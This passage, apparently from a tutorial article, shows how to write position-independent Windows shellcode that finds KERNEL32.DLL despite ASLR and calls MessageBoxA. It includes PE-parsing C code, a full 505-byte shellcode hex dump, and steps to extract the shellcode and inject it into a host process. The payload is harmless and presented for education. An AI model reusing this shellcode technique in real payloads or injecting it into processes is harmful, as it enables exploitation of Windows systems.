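    if (e_lfanew == 0 || e_lfanew > size || size - e_lfanew < 0xA8)
        return 0;
    const uint8_t *pe = img + e_lfanew;
    if (rd32(pe) != 0x00004550 || rd16(pe + 0x18) != 0x010B)  /* "PE\0\0", PE32 magic */
        return 0;
    uint16_t file_chars = rd16(pe + 0x16);                    /* FileHeader.Characteristics */
    uint16_t dll_chars  = rd16(pe + 0x5E);                    /* OptionalHeader.DllCharacteristics */
    /* DataDirectory starts at PE + 0x78; each entry is {VirtualAddress, Size}. */
    const uint8_t *reloc_dir = pe + 0x78 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC;
    int opted_in  = (dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
    int has_reloc = !(file_chars & IMAGE_FILE_RELOCS_STRIPPED) && rd32(reloc_dir + 4) != 0;
    return opted_in && has_reloc;
}
```

An image with the flag set but no relocation data reports 0, which matches the situation described above where the loader must ignore the flag.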

USING THE SOURCE CODE:
Building and running the DEBUG version of the target using the build script is shown below:

The program locates the first executable module at the highest memory location that contains both LoadLibraryA() and GetProcAddress() exported functions (i.e. KERNEL32.DLL). Then a small bit of code uses the found function pointers to manually load USER32.DLL and subsequently launch MessageBoxA() resulting in the "ASLR defeated" message box.

You can see that running the program multiple times will produce the same addresses, but after a reboot, the addresses will all change. This is ASLR in action.

Using pelook (or Microsoft's Depends will also work) to examine the KERNEL32.DLL exports, we can see that the ordinal and hint numbers match the debug output shown above. This indicates we parsed the exports table properly:

loaded "c:\Windows\SysWOW64\kernel32.dll" / 1114112 (0x110000) bytes
exports section: 1364 functions (KERNEL32.dll) / timestamp 11/30/2012 02:45:12am (0x50B81DB8)

ORD  HINT ENTRYPOINT F-OFFSET SECTION NAME
---- ---- ---------- -------- ------- ----
0582 0580 7DD71222   00011222 .text   GetProcAddress
0830 0829 7DD749BF   000149BF .text   LoadLibraryA

For the sake of brevity, the output above had the other export lines removed. This was from the 32-bit version of KERNEL32.DLL from Windows 7 SP1 (64-Bit).

LAUNCHING THE SHELLCODE:
There is no question that the code works fine when run from its *nice and safe* EXE file. The real test is whether it will still work when separated from its EXE "shell" and injected into another process.

The first step is to extract the relevant code from the EXE, between the markers explicitly placed there by the source code. Once the EXE has been built (for this article, it must be the default RELEASE build), run the shellcode_extract_from_exe script:

c:\tester\findkernel_src>shellcode_extract_from_exe.bat
505 bytes dumped to "shellcode.bin"
Offset: 1058 (0x422)
Dump Size: 505 (0x1F9)
File Size: 3072 (0xC00)

The extracted shellcode.bin should be 505 bytes (md5=c33335237962a0266758405014d1578e), representing the completed proof-of-concept program. The corresponding binary dump is:

00000000 e8 00 00 00 00 58 83 c0 06 eb 42 55 53 45 52 33 .....X....BUSER3
00000010 32 00 4d 65 73 73 61 67 65 42 6f 78 41 00 41 53 2.MessageBoxA.AS
00000020 4c 52 20 64 65 66 65 61 74 65 64 00 4d 65 73 73 LR defeated.Mess
00000030 61 67 65 42 6f 78 41 20 64 79 6e 61 6d 69 63 61 ageBoxA dynamica
00000040 6c 6c 79 20 6c 6f 63 61 74 65 64 21 00 55 8b ec lly located!.U..
00000050 50 ff 75 08 e8 63 00 00 00 50 52 8b 4d fc 51 ff P.u..c...PR.M.Q.
00000060 d2 50 8b 4d fc 83 c1 07 51 50 8b 45 f8 ff d0 50 .P.M....QP.E...P
00000070 6a 00 8b 4d fc 83 c1 13 51 83 c1 0e 51 6a 00 ff j..M....Q...Qj..
00000080 d0 b8 2b 02 00 00 8b e5 5d c2 04 00 55 e8 00 00 ..+.....]...U...
00000090 00 00 58 83 c0 17 50 33 d2 64 ff 32 64 89 22 8b ..X...P3.d.2d.".
000000A0 44 24 10 8b 00 33 c0 eb 09 33 c0 64 8b 20 8b 24 D$...3...3.d. .$
000000B0 24 40 33 d2 64 8f 02 5a 5d c2 04 00 55 8b ec 83 $@3.d..Z]...U...
000000C0 c4 e8 9c 60 fc e8 00 00 00 00 58 83 c0 06 eb 1c ...`......X.....
000000D0 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 LoadLibraryA.Get
000000E0 50 72 6f 63 41 64 64 72 65 73 73 00 89 45 f8 83 ProcAddress..E..
000000F0 c0 0d 89 45 f4 c7 45 fc 00 00 00 00 bb 00 00 fe ...E..E.........
00000100 7f 33 c9 60 53 e8 82 ff ff ff 89 45 f0 61 8b 45 .3.`S......E.a.E
00000110 f0 85 c0 0f 85 c5 00 00 00 8b 33 66 81 fe 4d 5a ..........3f..MZ
00000120 0f 85 b8 00 00 00 8b 73 3c 85 f6 0f 84 ad 00 00 .......s<.......
00000130 00 03 f3 8b 06 3d 50 45 00 00 0f 85 9e 00 00 00 .....=PE........
00000140 66 8b 46 18 66 3d 0b 01 0f 85 90 00 00 00 8b 7e f.F.f=.........~
00000150 78 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 85 x.E......E......
00000160 ff 74 7b 03 fb 89 7d f0 8b 4f 18 8b 57 20 03 d3 .t{...}..O..W ..
00000170 51 8b 32 83 fe 00 74 4f 03 f3 83 7d e8 00 75 11 Q.2...tO...}..u.
00000180 b9 0d 00 00 00 8b 7d f8 f3 a6 75 05 8d 75 e8 eb ......}...u..u..
00000190 13 b9 0f 00 00 00 8b 7d f4 8b 32 03 f3 f3 a6 75 .......}..2....u
000001A0 26 8d 75 ec 52 56 8b 7d f0 8b 77 1c 03 f3 8b 57 &.u.RV.}..w....W
000001B0 24 03 d3 8b 4f 18 2b 4c 24 08 0f b7 0c 4a 8b 0c $...O.+L$....J..
000001C0 8e 03 cb 5e 89 0e 5a 59 83 7d e8 00 74 08 83 7d ...^..ZY.}..t..}
000001D0 ec 00 74 02 eb 17 83 c2 04 49 85 c9 75 92 85 db ..t......I..u...
000001E0 74 0b 81 eb 00 00 01 00 e9 16 ff ff ff 61 9d 8b t............a..
000001F0 45 ec 8b 55 e8 c9 c2 04 00                      E..U.....

An easy way to test the shellcode fragment in a host process without writing a custom launcher is the shelljmp tool. Shelljmp maps a file into its process and "jumps" into it, starting execution at the entry point. Since the shellcode was designed with its entry point at the first byte, no offset needs to be specified. The shellcode can be launched with shellcode_run.bat:

Again, the message box appears (and blocks) just as it did when run solely from the EXE.

BENEFITS AND LIMITATIONS:
The algorithm depicted here is one of a few known methods to locate KERNEL32.DLL from shellcode. Unlike most methods, it is compatible with all versions of NT-based Windows (past and present), with or without ASLR. Its primary drawback is that it is incompatible with SafeSEH.

Other methods striking a balance between complexity and compatibility include:

Locating the top-most KERNEL32 exception handler from the FS:[0] chain
Walking the PEB's loaded module list
Walking the stack

The code presented here illustrates a "good-enough" solution and is intended for educational purposes only. It performs only minimal validation of the PE header to achieve its goals. Malformed headers could make it crash.

CONCLUSION:
While code can easily be extracted from a file, getting it to work regardless of where it is loaded in memory can be tricky. Position-independent code uses techniques that allow data and code to be packed within the same contiguous block. Initially, this shellcode block knows only about itself, based on its own fixed offsets. Only after it has discovered more about its surroundings can it do more "useful things," such as dynamically loading and calling functions in separate libraries. Writing position-independent code and making it robust enough to run anywhere on many operating systems is truly an art form.

<END OF ARTICLE>


Changelist for this document

    2018-09-18      * added links to top and within sentence in limitations regarding lack of SafeSEH compatibility
    2018-02-28      * added excerpt from Symantec's security whitepaper: An Analysis of Address Space Layout Randomization on Windows Vista™